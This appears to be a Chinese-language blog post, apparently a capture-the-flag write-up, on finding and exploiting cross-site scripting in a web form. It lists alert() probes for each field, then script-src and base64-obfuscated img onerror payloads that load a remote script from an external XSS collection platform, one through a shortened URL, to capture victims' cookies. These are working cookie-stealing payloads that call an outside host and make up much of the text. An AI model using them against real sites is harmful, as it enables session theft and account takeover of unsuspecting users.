跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的
1. 在不同的文本框中输入:
主题:<script>alert('1')</script>
内容:<script>alert('2')</script>
公司名称:<script>alert('3')</script>
公司地址:<script>alert('4')</script>
。。。
以此类推如果提交成功后,界面刷新,弹出1,则说明主题这里的script执行了,弹出2,说明内容中的script被执行了,那么XSS插入点就在主题或者内容这里
2. xss平台:http://xsspt.com
设置好后,如何使用:
将如下代码植入怀疑出现XSS的地方(注意'的转义),在即可项目内容观看XSS效果。
<script src = http://xsspt.com/hpwXbJ?1533043629> </ script>
或者以你任何想要的方式插入
http://xsspt.com/hpwXbJ?1533043629
*************************************************网址缩短*************************************************
再或者以你任何想要的方式插入<script src = http://t.cn/ReY6wWS> </ script>
再或者以你任何想要的方式插入
<img src = x onerror = eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtib2R5LmFwcGVuZENoaWxkKHMpO3Muc3JjPSdodHRwOi8veHNzcHQuY29tL2hwd1hiSj8nK01hdGgucmFuZG9tKCk ='))>
在主题处输入<script src = http://xsspt.com/hpwXbJ?1533043629> </ script>
提交后在xsspt中查看cookie,flag在cookie中
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.